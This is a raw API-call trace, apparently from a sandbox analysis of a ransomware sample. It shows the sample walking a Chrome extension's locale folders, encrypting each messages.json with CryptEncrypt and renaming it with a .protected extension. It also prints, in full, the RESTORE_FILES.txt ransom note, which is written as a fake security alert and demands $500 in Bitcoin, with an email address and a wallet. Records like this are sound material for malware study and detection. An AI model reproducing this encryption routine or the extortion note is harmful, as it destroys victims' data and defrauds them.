pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*") returned 143 [0078.748] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.748] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\.") returned 143 [0078.748] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.748] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.748] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.748] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.748] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\..") returned 144 [0078.749] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.749] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.749] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.749] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.749] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.749] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.749] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.749] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.749] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned 155 [0078.749] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.749] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0078.750] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.750] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe4, lpOverlapped=0x0) returned 1 [0078.751] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.751] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.751] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.751] CloseHandle (hObject=0x168) returned 1 [0078.751] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected") returned 165 [0078.751] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json.protected")) returned 1 [0078.751] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.752] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.752] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt") returned 159 [0078.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0078.752] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.752] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.753] lstrlenA (lpString="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") returned 684 [0078.753] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.753] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.753] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.753] CloseHandle (hObject=0x164) returned 1 [0078.753] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0078.753] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0078.753] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 141 [0078.753] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0078.753] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0078.753] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*") returned 143 [0078.753] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0078.754] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\.") returned 143 [0078.754] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\..") returned 144 [0078.754] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.754] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.754] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.754] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.754] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.754] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.754] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.754] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.754] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.755] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned 155 [0078.755] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.755] ReadFile (in: hFile=0x168, lpBuffer=0xd12130, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesRead=0x295d914*=0xe9, lpOverlapped=0x0) returned 1 [0078.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0xd12130*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd12130*, lpNumberOfBytesWritten=0x295d914*=0xe9, lpOverlapped=0x0) returned 1 [0078.756] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.756] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.756] CloseHandle (hObject=0x168) returned 1 [0078.756] wnsprintfW (in: pszDest=0xd12130, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected") returned 165 [0078.756] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json.protected")) returned 1 [0078.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.757] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.757] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt") returned 159 [0078.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.757] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.757] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.758] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.758] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.758] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.758] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.758] CloseHandle (hObject=0x164) returned 1 [0078.758] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="Program Files (x86)") returned -1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="$Recycle.bin") returned 1 [0078.758] lstrcmpiW (lpString1="ms", lpString2="System Volume Information") returned -1 [0078.758] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 141 [0078.758] lstrcmpW (lpString1="ms", lpString2=".") returned 1 [0078.758] lstrcmpW (lpString1="ms", lpString2="..") returned 1 [0078.758] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*") returned 143 [0078.758] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.758] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.758] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.758] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.758] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\.") returned 143 [0078.758] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.758] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.758] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.759] 
